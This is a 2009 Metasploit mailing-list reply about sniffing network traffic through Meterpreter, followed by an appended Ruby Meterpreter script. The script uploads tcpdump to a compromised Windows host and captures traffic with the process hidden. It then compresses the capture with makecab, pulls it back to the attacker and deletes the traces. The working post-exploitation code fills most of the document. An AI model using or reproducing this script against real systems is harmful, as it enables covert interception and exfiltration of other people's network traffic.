On Fri, 2009-02-13 at 08:30 -0700, Bryan Richardson wrote:
> I would love to be able to write an addition to the Meterpreter Net
> extension that provides this sniffing feature. I found a packet
> sniffing SDK that looks to make it possible to be able to create a
> self-contained executable that doesn't rely on libpcap at all (it's
> the SDK used in the stand-alone version of tcpdump for Windows).
> While I'm a pretty avid Ruby developer, I'm not much of a C
> developer. :( Can someone take a look at the SDK I found and let me
> know if it could be used for this? If so, I'll take the time to see
> if I can develop an extension on my own (hopefully with help from this
> list when needed :).
Thanks for the email, keep it coming; it's nice to have developer
feedback/suggestions/feature interest. You might get more feedback on
the main framework list, as I'm not sure how many of the devs are on both
lists right now.
Regarding the sniffer SDK, the real issue is licensing: the SDK has a
minimum licensing fee of $999 for one developer. We might be able to
trade them a blog post and press for a free license, but I am not sure a
new Meterpreter extension is the kind of press they want.
Personally, I have had success uploading the static tcpdump.exe to a
remote box, capturing traffic, compressing it with makecab, and pulling
it back down. I believe there is a Meterpreter script out there to
automate that process as well.
Framework-Hackers mailing list
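The upload-capture-makecab-download workflow described in the reply above, written as a Meterpreter script. This is an added example, not code from the thread and not a script shipped with the framework. It assumes a session on a Windows target with stdapi loaded, a static tcpdump.exe at the local path set in LOCAL_TCPDUMP (a hypothetical path), that the interface index passed as iface is correct for that target (run tcpdump.exe -D on the box first), and that the static build honours tcpdump's -U flag so every packet is flushed to the file before the process is terminated (a plain kill otherwise leaves whatever was still buffered out of the pcap). The names sniff_and_fetch, remote_cmd, capture_paths and tcpdump_args are this example's own.

```ruby
# Added example: Meterpreter script automating tcpdump.exe capture + makecab + download.
# Not part of Metasploit; uses only the stdapi calls listed in the lead-in.
LOCAL_TCPDUMP = '/opt/tools/tcpdump.exe' # assumed local path to the static Windows tcpdump

# Run a command through cmd.exe on the target and block until it exits,
# returning its output (same channelized-read pattern cmd_exec uses).
def remote_cmd(client, cmdline)
  out = String.new
  p = client.sys.process.execute('cmd.exe', "/c #{cmdline}",
                                 { 'Hidden' => true, 'Channelized' => true })
  while (d = p.channel.read)
    out << d
  end
  p.channel.close
  p.close
  out
end

# Remote file names for one capture job, derived from one tag so the
# upload, capture, compress and cleanup steps all agree.
def capture_paths(tmpdir, tag)
  base = "#{tmpdir}\\#{tag}"
  { exe: "#{base}_tcpdump.exe", pcap: "#{base}.pcap", cab: "#{base}.cab" }
end

# tcpdump argument string: full snaplen, packet-buffered writes (-U) so the
# file is complete when we kill the process, plus an optional BPF filter.
def tcpdump_args(iface, pcap, filter = '')
  args = "-i #{iface} -s 0 -U -w \"#{pcap}\""
  args << " #{filter}" unless filter.to_s.empty?
  args
end

# Upload tcpdump, sniff for +seconds+, compress the pcap with makecab (LZX),
# pull the cab back, and remove all three artifacts from the target.
# Returns the local path of the downloaded cab.
def sniff_and_fetch(client, iface: 1, seconds: 60, filter: '', local_dir: '.',
                    tcpdump: LOCAL_TCPDUMP, tag: "cap#{Time.now.to_i}")
  tmpdir = client.fs.file.expand_path('%TEMP%')
  paths  = capture_paths(tmpdir, tag)

  client.fs.file.upload_file(paths[:exe], tcpdump)
  sniffer = client.sys.process.execute(paths[:exe],
                                       tcpdump_args(iface, paths[:pcap], filter),
                                       { 'Hidden' => true })
  sleep(seconds)
  client.sys.process.kill(sniffer.pid)

  # makecab is present on every Windows box, so nothing else needs uploading.
  remote_cmd(client, "makecab /D CompressionType=LZX \"#{paths[:pcap]}\" \"#{paths[:cab]}\"")

  local_cab = File.join(local_dir, "#{tag}.cab")
  client.fs.file.download_file(local_cab, paths[:cab])

  [paths[:exe], paths[:pcap], paths[:cab]].each { |f| client.fs.file.rm(f) }
  local_cab
end

# When loaded with `run` inside a Meterpreter session the framework defines `client`.
# The filter keeps the session's own traffic (assumed to be on port 4444) out of the capture.
if defined?(client) && client
  cab = sniff_and_fetch(client, iface: 1, seconds: 60, filter: 'not port 4444', local_dir: '/tmp')
  print_status("Capture saved to #{cab} (expand with: cabextract #{cab})")
end
```

Killing the sniffer with process.kill is a TerminateProcess, so the -U flag is what keeps the last packets; without it the tail of the pcap is whatever tcpdump had already written. Excluding the session's own port matters more than it looks: a channelized Meterpreter session generates enough traffic to dominate a short capture.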